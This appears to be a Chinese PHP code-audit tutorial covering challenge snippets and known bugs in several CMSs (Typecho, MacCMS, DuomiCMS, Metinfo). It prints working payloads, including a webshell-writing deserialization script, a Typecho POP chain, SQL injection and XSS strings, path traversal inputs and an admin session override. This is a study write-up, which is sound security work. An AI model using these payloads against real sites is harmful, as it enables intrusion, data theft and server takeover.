<h3>CTF</h3>
<ul>
<li>环境搭建</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200312160331.png" alt="" /></p>
<ul>
<li>buy.php</li>
</ul>
<pre><code class="language-js line-numbers">&lt;script type="text/javascript" src="js/buy.js"&gt;&lt;/script&gt;
</code></pre>
<ul>
<li>bug.js</li>
</ul>
<pre><code class="language-js line-numbers">function buy(){
    $('#wait').show();
    $('#result').hide();
    var input = $('#numbers')[0];
    if(input.validity.valid){
        var numbers = input.value;
        $.ajax({
          method: "POST",
          url: "api.php",
          dataType: "json",
          contentType: "application/json", 
          data: JSON.stringify({ action: "buy", numbers: numbers })
        }).done(function(resp){
            if(resp.status == 'ok'){
                show_result(resp);
            } else {
                alert(resp.msg);
            }
        })
    } else {
        alert('invalid');
    }
    $('#wait').hide();
}
</code></pre>
<p><strong>将用户提交的数字传入到api.php的buy函数</strong></p>
<ul>
<li>api.php</li>
</ul>
<pre><code class="language-php line-numbers">    for($i=0; $i&lt;7; $i++){
        if($numbers[$i] == $win_numbers[$i]){
            $same_count++;
        }
    }
</code></pre>
<p><strong>由于是==，可进行弱类型比较，传入7个true</strong></p>
<ul>
<li>payload</li>
</ul>
<pre><code class="line-numbers">[true,true,true,true,true,true,true]
</code></pre>
<ul>
<li>购买flag</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200312171526.png" alt="" /></p>
<h2>escapeshellarg与escapeshellcmd使用不当</h2>
<p><strong>escapeshellcmd: 除去字串中的特殊符号</strong><br />
<strong>escapeshellarg 把字符串转码为可以在 shell 命令里使用的参数</strong></p>
<h3>postcard</h3>
<ul>
<li>code</li>
</ul>
<pre><code class="language-php line-numbers">class Mailer {
  private function sanitize($email) {
    if (!filter_var($email, FILTER_VALIDATE_EMAIL)) {
      return '';
    }

    return escapeshellarg($email);
  }

  public function send($data) {
    if (!isset($data['to'])) {
      $data['to'] = 'none@ripstech.com';
    } else {
      $data['to'] = $this-&gt;sanitize($data['to']);
    }

    if (!isset($data['from'])) {
      $data['from'] = 'none@ripstech.com';
    } else {
      $data['from'] = $this-&gt;sanitize($data['from']);
    }

    if (!isset($data['subject'])) {
      $data['subject'] = 'No Subject';
    }

    if (!isset($data['message'])) {
      $data['message'] = '';
    }

    mail($data['to'], $data['subject'], $data['message'],
      '', "-f" . $data['from']);
  }
}

$mailer = new Mailer();
$mailer-&gt;send($_POST);
</code></pre>
<p><strong>新建一个MAil类进行邮件发送</strong></p>
<ul>
<li>Php内置函数mail</li>
</ul>
<pre><code class="language-php line-numbers">bool mail (
    string $to , 接收人
    string $subject , 邮件标题
    string $message [, 征文
    string $additional_headers [, 额外头部
    string $additional_parameters ]] 额外参数
)
</code></pre>
<ul>
<li>Linux中的额外参数</li>
</ul>
<pre><code class="line-numbers">-O option = value

QueueDirectory = queuedir 选择队列消息

-X logfile

这个参数可以指定一个目录来记录发送邮件时的详细日志情况。

-f from email

这个参数可以让我们指定我们发送邮件的邮箱地址。
</code></pre>
<ul>
<li>举个例子（原文图）</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200429165336.png" alt="" /></p>
<ul>
<li>结果</li>
</ul>
<pre><code class="line-numbers">17220 &lt;&lt;&lt; To: Alice@example.com
 17220 &lt;&lt;&lt; Subject: Hello Alice!
 17220 &lt;&lt;&lt; X-PHP-Originating-Script: 0:test.php
 17220 &lt;&lt;&lt; CC: somebodyelse@example.com
 17220 &lt;&lt;&lt;
 17220 &lt;&lt;&lt; &lt;?php phpinfo(); ?&gt;
 17220 &lt;&lt;&lt; [EOF]
</code></pre>
<ul>
<li>filter_var()问题（FILTER_VALIDATE_EMAIL）</li>
</ul>
<blockquote><p>
  filter_var() 问题在于，我们在双引号中嵌套转义空格仍然能够通过检测。同时由于底层正则表达式的原因，我们通过重叠单引号和双引号，欺骗 filter_val() 使其认为我们仍然在双引号中，这样我们就可以绕过检测。
</p></blockquote>
<pre><code class="line-numbers">”aaa’aaa”@example.com
</code></pre>
<ul>
<li>escapeshellcmd() 和 escapeshellarg()（会造成特殊字符逃逸）</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200429180904.png" alt="" /></p>
<ul>
<li>逃逸过程分析</li>
</ul>
<pre><code class="line-numbers">$param = "127.0.0.1' -v -d a=1";
$a = escapeshellcmd($param);
$b = escapeshellarg($a);
$cmd = "curl".$b;
var_dump($a)."\n";
var_dump($b)."\n";
var_dump($cmd)."\n";
system($cmd);
</code></pre>
<p><strong>传入127.0.0.1&#8242; -v -d a=1，escapeshellarg首先进行转义，处理为&#8217;127.0.0.1&#8217;\&#8221; -v -d a=1&#8217;，接着escapeshellcmd处理，处理结果为&#8217;127.0.0.1&#8217;&#92;&#8221; -v -d a=1\&#8217;,&#92; 被解释成了 \ 而不再是转义字符</strong></p>
<h4>参考</h4>
<pre><code class="line-numbers">https://www.leavesongs.com/PENETRATION/some-tricks-of-attacking-lnmp-web-application.html
</code></pre>
<h2>正则使用不当导致的路径穿越问题</h2>
<h3>Frost Pattern</h3>
<ul>
<li>code</li>
</ul>
<pre><code class="language-php line-numbers">class TokenStorage {
  public function performAction($action, $data) {
    switch ($action) {
      case 'create':
        $this-&gt;createToken($data);
        break;
      case 'delete':
        $this-&gt;clearToken($data);
        break;
      default:
        throw new Exception('Unknown action');
    }
  }

  public function createToken($seed) {
    $token = md5($seed);
    file_put_contents('/tmp/tokens/' . $token, '...data');
  }

  public function clearToken($token) {
    $file = preg_replace("/[^a-z.-_]/", "", $token);
    unlink('/tmp/tokens/' . $file);
  }
}

$storage = new TokenStorage();
$storage-&gt;performAction($_GET['action'], $_GET['data']);
</code></pre>
<ul>
<li>preg_replace(函数执行一个正则表达式的搜索和替换)</p>
</li>
<li>
<p>payload</p>
</li>
</ul>
<pre><code class="line-numbers">$action =delete$data = ../../config.php
</code></pre>
<h3>WeEngine0.8</h3>
<ul>
<li>web/source/site/category.ctrl.php:176</li>
</ul>
<p><strong>file_delete文件删除函数</strong><br />
<img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200510093718.png" alt="" /></p>
<ul>
<li>framework/function/file.func.php:294</li>
</ul>
<p><strong>查看file_delete函数</strong></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200510093823.png" alt="" /></p>
<ul>
<li>追朔$file变量从何而来</li>
</ul>
<pre><code class="language-php line-numbers">if (!empty($navs)) {
        foreach ($navs as $row) {
            file_delete($row['icon']);
        }
</code></pre>
<ul>
<li>追朔$navs从何而来</li>
</ul>
<pre><code class="language-php line-numbers">    $navs = pdo_fetchall("SELECT icon, id FROM ".tablename('site_nav')." WHERE id IN (SELECT nid FROM ".tablename('site_category')." WHERE id = {$id} OR parentid = '$id')", array(), 'id');
</code></pre>
<ul>
<li>web/source/site/category.ctrl.php:137</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200510095825.png" alt="" /></p>
<ul>
<li>web/source/site/category.ctrl.php:130</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200510095930.png" alt="" /></p>
<p><strong>$nav[&#8216;icon&#8217;] 即为文件删除函数的参</strong></p>
<h2>parse_str函数缺陷</h2>
<ul>
<li>parse_str</li>
</ul>
<pre><code class="line-numbers">parse_str的作用就是解析字符串并且注册成变量，它在注册变量之前不会验证当前变量是否存在，所以会直接覆盖掉当前作用域中原有的变量。
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200510103038.png" alt="" /></p>
<h2>preg_replace函数之命令执行</h2>
<h3>Candle</h3>
<ul>
<li>code</li>
</ul>
<pre><code class="language-php line-numbers">header("Content-Type: text/plain");

function complexStrtolower($regex, $value) {
  return preg_replace(
    '/(' . $regex . ')/ei',
    'strtolower("\\1")',
    $value
  );
}

foreach ($_GET as $regex =&gt; $value) {
  echo complexStrtolower($regex, $value) . "\n";
}
</code></pre>
<ul>
<li>preg_replace(函数执行一个正则表达式的搜索和替换)</li>
</ul>
<pre><code class="language-php line-numbers">mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &amp;$count ]] )
</code></pre>
<p><strong>$pattern 存在 /e 模式修正符，允许代码执行</strong><br />
<strong>/e 模式修正符，是 preg_replace() 将 $replacement 当做php代码来执行</strong></p>
<p><strong>将GET请求传过来的参数通过complexStrtolower函数执行，preg_replace函数存在e修正符</strong></p>
<ul>
<li>payload</li>
</ul>
<pre><code class="language-php line-numbers">S*=${phpinfo()} 
</code></pre>
<h4>参考</h4>
<p><a class="wp-editor-md-post-content-link" href="https://xz.aliyun.com/t/2557">深入研究preg_replace与代码执行</a></p>
<h3>CmsEasy 5.5</h3>
<ul>
<li>环境搭建</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200510160914.png" alt="" /></p>
<h4>漏洞分析</h4>
<ul>
<li>lib/tool/form.php:90</li>
</ul>
<p><strong>如果$form[$name][&#8216;default&#8217;]内容被匹配到就会执行eval</strong></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200510161952.png" alt="" /></p>
<ul>
<li>cache/template/default/manage/#guestadd.php:175</li>
</ul>
<p><strong>全局搜索getform，主要注意catid是作为$name的</strong></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200510162528.png" alt="" /></p>
<ul>
<li>lib/table/archive.php:25</li>
</ul>
<p><strong>追朔catid,寻找到default</strong></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200510163510.png" alt="" /></p>
<ul>
<li>lib/tool/front_class.php:2367</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200510163724.png" alt="" /></p>
<ul>
<li>lib/tool/front_class.php:493</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200510163809.png" alt="" /></p>
<ul>
<li>lib/tool/front_class.php:332</li>
</ul>
<p><strong>$form[$name][&#8216;default&#8217;]可控</strong><br />
<img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200510164008.png" alt="" /></p>
<ul>
<li>lib/default/manage_act.php:29</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200510164614.png" alt="" /></p>
<ul>
<li>测试</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200510165011.png" alt="" /></p>
<h2>str_replace函数过滤不当</h2>
<h4>Rabbit</h4>
<ul>
<li>code</li>
</ul>
<pre><code class="language-php line-numbers">class LanguageManager {
  public function loadLanguage() {
    $lang = $this-&gt;getBrowserLanguage();
    $sanitizedLang = $this-&gt;sanitizeLanguage($lang);
    require_once("/lang/$sanitizedLang");
  }

  private function getBrowserLanguage() {
    $lang = $_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? 'en';
    return $lang;
  }

  private function sanitizeLanguage($language) {
    return str_replace('../', '', $language);
  }
}

(new LanguageManager())-&gt;loadLanguage();
</code></pre>
<ul>
<li>str_replace(子字符串替换)</li>
</ul>
<pre><code class="line-numbers">str_replace(字符串1，字符串2，字符串3)：将字符串3中出现的所有字符串1换成字符串2。

str_replace(数组1，字符串1，字符串2)：将字符串2中出现的所有数组1中的值，换成字符串1。

str_replace(数组1，数组2，字符串1)：将字符串1中出现的所有数组1一一对应，替换成数组2的值，多余的替换成空字符串。
</code></pre>
<ul>
<li>payload</li>
</ul>
<pre><code class="line-numbers">....// 或者 ..././ 
</code></pre>
<h3>Metinfo 6.0.0</h3>
<ul>
<li>strstr</li>
</ul>
<pre><code class="line-numbers">查找字符串的首次出现到结尾的字符串
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200510181653.png" alt="" /></p>
<h4>漏洞分析</h4>
<ul>
<li>app/system/include/module/old_thumb.class.php:14</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200510183440.png" alt="" /></p>
<ul>
<li>include/thumb.php:6</li>
</ul>
<p><strong>全局搜索</strong><br />
<img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200510183630.png" alt="" /></p>
<ul>
<li>app/system/include/class/load.class.php:113</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200510183942.png" alt="" /></p>
<ul>
<li>payload</li>
</ul>
<pre><code class="line-numbers">http://localhost/metInfo/include/thumb.php?dir=.....///http/.....///最终用户授权许可协议.txt
</code></pre>
<h2>程序未恰当exit导致的问题</h2>
<h3>Anticipation</h3>
<ul>
<li>code</li>
</ul>
<pre><code class="language-php line-numbers">extract($_POST);

function goAway() {
  error_log("Hacking attempt.");
  header('Location: /error/');
}

if (!isset($pi) || !is_numeric($pi)) {
  goAway();
}

if (!assert("(int)$pi == 3")) {
  echo "This is not pi.";
} else {
  echo "This might be pi.";
}
</code></pre>
<ul>
<li>extract</li>
</ul>
<pre><code class="line-numbers">从数组中将变量导入到当前的符号表
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200511104100.png" alt="" /></p>
<ul>
<li>payload</li>
</ul>
<pre><code class="language-php line-numbers">pl=phpinfo()
</code></pre>
<ul>
<li>测试</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200511105009.png" alt="" /></p>
<h3>FengCms 1.32</h3>
<ul>
<li>install/index.php</li>
</ul>
<p><strong>如果安装完成会生成INSTALL文件，访问文件如果存在此文件则会弹窗提示退出，但没有及时exit，导致程序逻辑还是往下走，还是会安装</strong></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200511105552.png" alt="" /></p>
<h3>Simple-Log1.6网站重装漏洞</h3>
<ul>
<li>install/index.php</li>
</ul>
<p><strong>访问文件如果存在此文件则会弹窗提示退出，但没有及时exit，只是跳转到首页，导致程序逻辑还是往下走，还是会安装</strong></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200511105858.png" alt="" /></p>
<h2>unserialize反序列化漏洞</h2>
<h3>Pumpkin Pie</h3>
<ul>
<li>code</li>
</ul>
<pre><code class="language-php line-numbers">class Template {
  public $cacheFile = '/tmp/cachefile';
  public $template = '&lt;div&gt;Welcome back %s&lt;/div&gt;';

  public function __construct($data = null) {
    $data = $this-&gt;loadData($data);
    $this-&gt;render($data);
  }

  public function loadData($data) {
    if (substr($data, 0, 2) !== 'O:'
      &amp;&amp; !preg_match('/O:\d:\/', $data)) {
      return unserialize($data);
    }
    return [];
  }

  public function createCache($file = null, $tpl = null) {
    $file = $file ?? $this-&gt;cacheFile;
    $tpl = $tpl ?? $this-&gt;template;
    file_put_contents($file, $tpl);
  }

  public function render($data) {
    echo sprintf(
      $this-&gt;template,
      htmlspecialchars($data['name'])
    );
  }

  public function __destruct() {
    $this-&gt;createCache();
  }
}

new Template($_COOKIE['data']);
</code></pre>
<ul>
<li>题解</li>
</ul>
<p><strong>在loadData函数中使用到了unserialize反序列化方法，对传进来的$data进行了反序列化，最后对Template进行了实例化，将COOKIE中的data进行了反序列化。</strong></p>
<pre><code class="language-php line-numbers">if (substr($data, 0, 2) !== 'O:'
      &amp;&amp; !preg_match('/O:\d:\/', $data))
</code></pre>
<p><strong>代码对data进行了判断，不可以为对象，0:X，X不可以为数字，绕过方法可以使用array数组绕过第一个，在X前面加+绕过第二个限制，搭达到到达反序列化方法的步骤。在__destruct销毁时会调用createCache方法写入文件，达成目的。</strong></p>
<ul>
<li>payload</li>
</ul>
<pre><code class="language-php line-numbers">&lt;?php

class Template{

    public $cacheFile = './test.php';
    public $template = '&lt;?php eval($_POST[xx])&gt;';
}


$temp= new Template();
$test = Array($temp);
print(serialize($test));

?&gt;
</code></pre>
<ul>
<li>测试</li>
</ul>
<pre><code class="line-numbers">a:1:{i:0;O:+8:"Template":2:{s:9:"cacheFile";s:10:"./test.php";s:8:"template";s:26:"";}}
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200512133601.png" alt="" /></p>
<h3>Typecho-1.1</h3>
<ul>
<li>环境搭建</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200512134011.png" alt="" /></p>
<h4>漏洞分析</h4>
<ul>
<li>install.php:230</li>
</ul>
<p><strong>将cookie中的__typecho_configbase64解码之后进行反序列化操作</strong></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200512134626.png" alt="" /></p>
<ul>
<li>条件</li>
</ul>
<p><strong>如果finish不存在，或者存在config.inc.php文件$_SESSION[&#8216;typecho&#8217;]为空，则退出程序</strong></p>
<pre><code class="language-php line-numbers">if (!isset($_GET['finish']) &amp;&amp; file_exists(__TYPECHO_ROOT_DIR__ . '/config.inc.php') &amp;&amp; empty($_SESSION['typecho'])) {
    exit;}
</code></pre>
<pre><code class="line-numbers">finish=1
</code></pre>
<p><strong>将反序列化后的结果传递给$config</strong></p>
<ul>
<li>install.php:232</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200512140042.png" alt="" /></p>
<ul>
<li>var/Typecho/Db.php:114</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200512140213.png" alt="" /></p>
<p><strong>变量adapterName = &#8216;Typecho_Db_Adapter_&#8217; . 变量adapterName，如果adapterName是对象，会触发__toString()方法</strong></p>
<ul>
<li>var/Typecho/Feed.php:223</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200512141504.png" alt="" /></p>
<ul>
<li>var/Typecho/Feed.php:290</li>
</ul>
<p><strong>如果$item[&#8216;author&#8217;]->screenName为私有属性或者不存在会触发__get方法</strong><br />
<img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200512143628.png" alt="" /></p>
<pre><code class="language-php line-numbers">    public function __get($key)
    {
        return $this-&gt;get($key);
    }
</code></pre>
<ul>
<li>var/Typecho/Request.php:295</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200512144017.png" alt="" /></p>
<p><strong>call_user_fun回调函数，$this->_param[&#8216;scrrenName&#8217;] 的值设置为想要执行的函数，构造 $this->_filter 为对应函数的参数值self::RSS2 == $this->_type,type需要构造，item[&#8216;author&#8217;]为触发点，需要构造this_items</strong></p>
<ul>
<li>构造payload</li>
</ul>
<pre><code class="language-php line-numbers">&lt;?php

class Typecho_Request{

    private $_params = array();
    private $_fifter = array();

    public function __construct(){
        $this-&gt;_params['screenName'] = 'phpinfo()';
        $this-&gt;_fifter[0] = 'assert';
    }
}

class Typecho_Feed{

    private $_type;
    private $_item = array();
    public function s__construct(){

        $this-&gt;_type = 'RSS 2.0';
        $item['author'] = new Typecho_Request();
        $item['category']=Array(new Typecho_Request());
        $this-&gt;_item[0]=$item;
    }
}

$x = new Typecho_Feed();
$a = array(
    'adapter' =&gt; $x,
    'prefix' =&gt; 'Typecho_'

);

echo base64_encode(serialize($a));

?&gt;
</code></pre>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200512150509.png" alt="" /></p>
<ul>
<li>测试</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200512153050.png" alt="" /></p>
<h2>误用htmlentities函数引发的漏洞</h2>
<h3>String Lights</h3>
<ul>
<li>code</li>
</ul>
<pre><code class="language-php line-numbers">$sanitized = [];

foreach ($_GET as $key =&gt; $value) {
  $sanitized[$key] = intval($value);
}

$queryParts = array_map(function ($key, $value) {
  return $key . '=' . $value;
}, array_keys($sanitized), array_values($sanitized));

$query = implode('&amp;', $queryParts);

echo "&lt;a href='/images/size.php?" .
  htmlentities($query) . "'&gt;link&lt;/a&gt;";
</code></pre>
<ul>
<li>htmlentities</li>
</ul>
<pre><code class="line-numbers">将字符转换为 HTML 转义字符
</code></pre>
<p><em>ENT_COMPAT（默认值）：只转换双引号。<br />
ENT_QUOTES：两种引号都转换。<br />
ENT_NOQUOTES：两种引号都不转换。</em></p>
<ul>
<li>环境搭建</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200512165224.png" alt="" /></p>
<ul>
<li>payload</li>
</ul>
<pre><code class="line-numbers">a%27onclick%3Dalert%281%29%2f%2f=1
</code></pre>
<h3>DM企业建站系统 v201710</h3>
<h4>漏洞分析</h4>
<ul>
<li>admindm-yourname/mod_common/login.php:63</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200512171350.png" alt="" /></p>
<ul>
<li>直接拼接数据</li>
</ul>
<pre><code class="language-php line-numbers"> $ss_P="select * from ".TABLE_USER."  where  email='$user' and ps='$pscrypt'  order by id desc limit 1";
</code></pre>
<ul>
<li>component/dm-config/global.common.php:421</li>
</ul>
<p><strong>ENT_NOQUOTES两种引号都不转换，造成注入</strong><br />
<img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200512171544.png" alt="" /></p>
<h2>特定场合下addslashes函数的绕过</h2>
<h3>Turkey Baster</h3>
<ul>
<li>code</li>
</ul>
<pre><code class="language-php line-numbers">class LoginManager {
  private $em;
  private $user;
  private $password;

  public function __construct($user, $password) {
    $this-&gt;em = DoctrineManager::getEntityManager();
    $this-&gt;user = $user;
    $this-&gt;password = $password;
  }

  public function isValid() {
    $user = $this-&gt;sanitizeInput($this-&gt;user);
    $pass = $this-&gt;sanitizeInput($this-&gt;password);

    $queryBuilder = $this-&gt;em-&gt;createQueryBuilder()
      -&gt;select("COUNT(p)")
      -&gt;from("User", "u")
      -&gt;where("user = '$user' AND password = '$pass'");
    $query = $queryBuilder-&gt;getQuery();
    return boolval($query-&gt;getSingleScalarResult());
  }

  public function sanitizeInput($input, $length = 20) {
    $input = addslashes($input);
    if (strlen($input) &gt; $length) {
      $input = substr($input, 0, $length);
    }
    return $input;
  }
}

$auth = new LoginManager($_POST['user'], $_POST['passwd']);
if (!$auth-&gt;isValid()) {
  exit;
</code></pre>
<ul>
<li>题解</li>
</ul>
<p><strong>实例化一个LoginManager类名，接收用户传递的user，passwd两个参数，并通过isValid方法判断是否合法，sanitizeInput方法，通过addslashes方法进行过滤，再截取20位返回。</strong></p>
<ul>
<li>addslashes</li>
</ul>
<pre><code class="line-numbers">作用：在单引号（'）、双引号（"）、反斜线（\）与 NUL（ NULL 字符）字符之前加上反斜线
</code></pre>
<ul>
<li>substr</li>
</ul>
<pre><code class="line-numbers">string substr ( string $string , int $start [, int $length ] )
</code></pre>
<p><strong>返回字符串 string 由 start 和 length 参数指定的子字符串。</strong></p>
<ul>
<li>user</li>
</ul>
<pre><code class="line-numbers">1234567890123456789'
</code></pre>
<ul>
<li>sql</li>
</ul>
<pre><code class="line-numbers">select count(p) from user where user = '1234567890123456789\' AND password = 'or 1=1#'
</code></pre>
<ul>
<li>payload</li>
</ul>
<pre><code class="line-numbers">user=1234567890123456789'&amp;passwd=or 1=1#
</code></pre>
<h2>苹果CMS视频分享程序 8.0</h2>
<ul>
<li>环境搭建</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200512232311.png" alt="" /></p>
<h4>漏洞分析</h4>
<ul>
<li>inc/common/template.php:754</li>
</ul>
<p><strong>$lp[&#8216;wd&#8217;]直接拼接SQL语句，造成SQL注入</strong></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200513085115.png" alt="" /></p>
<ul>
<li>inc/module/vod.php:96</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200513091938.png" alt="" /></p>
<ul>
<li>inc/common/function.php:266</li>
</ul>
<p><strong>对传进来的参数进行过滤</strong></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200513092121.png" alt="" /></p>
<p>在<em>$res=isset($_REQUEST[$key]) ? $magicq ? $_REQUEST[$key] : @addslashes($_REQUEST[$key]) : &#8221;;</em>中可以知道wd参数是通过REQUEST方法获取的然后进行过滤。</p>
<ul>
<li>inc/common/360_safe3.php:27</li>
</ul>
<p><strong>跟踪chkSql函数</strong></p>
<p><em>将传进来的参数进行urldecode解码之后，通过StopAttack方法，最后通过htmlEncode方法，最后返回。</em></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200513093123.png" alt="" /></p>
<ul>
<li>inc/common/360_safe3.php:12</li>
</ul>
<p><em>跟进StopAttack方法，使用preg_match方法进行过滤</em></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200513094302.png" alt="" /></p>
<ul>
<li>inc/common/360_safe3.php:57<br />
<em>跟踪$getfilter方法</em></li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200513095310.png" alt="" /></p>
<ul>
<li>inc/common/function.php:572</li>
</ul>
<p><em>跟踪一下htmlEncode方法，针对 &amp; 、 &#8216; 、 空格 、 &#8221; 、 TAB 、 回车 、 换行 、 大于小于号 等符号进行实体编码转换</em></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200513095430.png" alt="" /></p>
<ul>
<li>inc/common/template.php:560</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200513101624.png" alt="" /></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200513091938.png" alt="" /></p>
<p><em>而 wd 是可以从 REQUEST 中获取到，所以wd 实际上是可控的。</em></p>
<ul>
<li>漏洞思路</li>
</ul>
<p><em>SQL注入点是字符型注入，htmlEncode方法实体编码了单引号，最后进行了url解码操作，可以通过双编码绕过，htmlEncode方法没有过滤反斜杠，而addslashes方法会过滤反斜杠。</em></p>
<ul>
<li>构造SQL</li>
</ul>
<pre><code class="line-numbers">wd=))||if((select%0b(select(m_name)``from(mac_manager))regexp(0x5e61)),(`sleep`(3)),0)#%25%35%63
</code></pre>
<h2>从变量覆盖到getshell</h2>
<h3>Snowman</h3>
<ul>
<li>code</li>
</ul>
<pre><code class="language-php line-numbers">class Carrot {
  const EXTERNAL_DIRECTORY = '/tmp/';
  private $id;
  private $lost = 0;
  private $bought = 0;

  public function __construct($input) {
    $this-&gt;id = rand(1, 1000);

    foreach ($input as $field =&gt; $count) {
      $this-&gt;$field = $count++;
    }
  }

  public function __destruct() {
    file_put_contents(
      self::EXTERNAL_DIRECTORY . $this-&gt;id,
      var_export(get_object_vars($this), true)
    );
  }
}

$carrot = new Carrot($_GET);
</code></pre>
<ul>
<li>payload</li>
</ul>
<pre><code class="line-numbers">id=shell.pho&amp;shell=',)%0a// 
</code></pre>
<ul>
<li>测试</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200513120025.png" alt="" /></p>
<h3>DuomiCMS_3.0</h3>
<ul>
<li>环境搭建</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200513133757.png" alt="" /></p>
<h4>漏洞分析</h4>
<ul>
<li>duomiphp/common.php:52</li>
</ul>
<p><em>查看全局变量注册代码</em></p>
<pre><code class="language-php line-numbers">foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k =&gt; $_v) ${$_k} = _RunMagicQuotes($_v);
}
</code></pre>
<ul>
<li>duomiphp/common.php:36</li>
</ul>
<p><em>查看_RunMagicQuotes方法, _RunMagicQuotes 函数将特殊符号，使用 addslashes 函数进行转义处理</em></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200513134725.png" alt="" /></p>
<ul>
<li>admin/admin_ping.php:13</li>
</ul>
<p><em>全剧追踪fwrite函数，$weburl与token来源于post，可控。</em></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200513135318.png" alt="" /></p>
<p><em>weburl 变量和 token 变量从 POST方式获取，经过了_RunMagicQuotes方法还有webscan.php的过滤，但是可以写shell</em></p>
<p><strong>admin\admin_ping.php文件得需要admin身份才可以有访问权限写shell</strong></p>
<ul>
<li>admin/config.php:28</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200513140949.png" alt="" /></p>
<ul>
<li>duomiphp/check.admin.php:41</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200513141135.png" alt="" /></p>
<ul>
<li>admin/login.php:62</li>
</ul>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200513142847.png" alt="" /></p>
<ul>
<li>duomiphp/check.admin.php:72</li>
</ul>
<p><em>跟进checkUser方法</em></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200513143011.png" alt="" /></p>
<p><img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200513143114.png" alt="" /></p>
<ul>
<li>登陆管理用户查看组</li>
</ul>
<p><em>可知用户组和userid均为1</em><br />
<img src="https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200513151034.png" alt="" /></p>
<ul>
<li>覆盖 session 的值</li>
</ul>
<p><strong>重点注意这里git项目上的覆盖session有问题，可以使用这个payload</strong></p>
<pre><code class="line-numbers">member/share.php?_SESSION[duomi_group_id]=1&amp;_SESSION[duomi_admin_id]=1
</code></pre>
<ul>
<li>payload</li>
</ul>
<p>&#8220;`POST /admin/admin_ping.php?action=set HTTP/1.1<br />
Host: www.test.com:8888<br />
Cache-Control: max-age=0<br />
Upgrade-Insecure-Requests: 1<br />
